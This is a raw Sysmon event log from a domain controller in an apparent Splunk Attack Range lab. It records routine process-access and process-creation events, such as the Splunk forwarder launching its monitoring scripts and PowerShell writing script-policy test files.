09:20:22.343{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054161Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.343{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054160Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.343{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054159Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.343{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD6-6151-6700-00000000FD01}3688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054158Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.343{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD6-6151-6700-00000000FD01}3688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054157Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.346{5EBD8912-8CD6-6151-6700-00000000FD01}3688C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054156Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.234{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD6-6151-6600-00000000FD01}2248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054155Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.234{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054154Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.234{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054153Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.234{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054152Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.234{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054151Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.234{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054150Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.234{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054149Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.234{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054148Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.234{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054147Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.234{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054146Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.234{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD6-6151-6600-00000000FD01}2248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054145Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.234{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD6-6151-6600-00000000FD01}2248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054144Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.237{5EBD8912-8CD6-6151-6600-00000000FD01}2248C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000001054143Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.531{5EBD8912-8CD0-6151-2E00-00000000FD01}2384WIN-DC-4290fe80::65e5:9cae:dd2b:361b;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 10341000x80000000000000001054142Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.187{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CD5-6151-6200-00000000FD01}3396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054141Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.187{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CD5-6151-6200-00000000FD01}3396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001054140Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:22.172{5EBD8912-8CD5-6151-6200-00000000FD01}3396\PSHost.132772080218306312.3396.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001054139Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.172{5EBD8912-8CD5-6151-6200-00000000FD01}3396NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_hbsxed2f.jpk.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054138Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.172{5EBD8912-8CD5-6151-6200-00000000FD01}3396NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_kfg0p2i5.bts.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001054137Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.156{5EBD8912-8CD5-6151-6200-00000000FD01}3396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_kfg0p2i5.bts.ps12021-09-27 09:20:22.156 10341000x80000000000000001054136Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.140{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD5-6151-6200-00000000FD01}3396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054135Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.125{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD6-6151-6500-00000000FD01}3672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054134Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.125{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054133Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 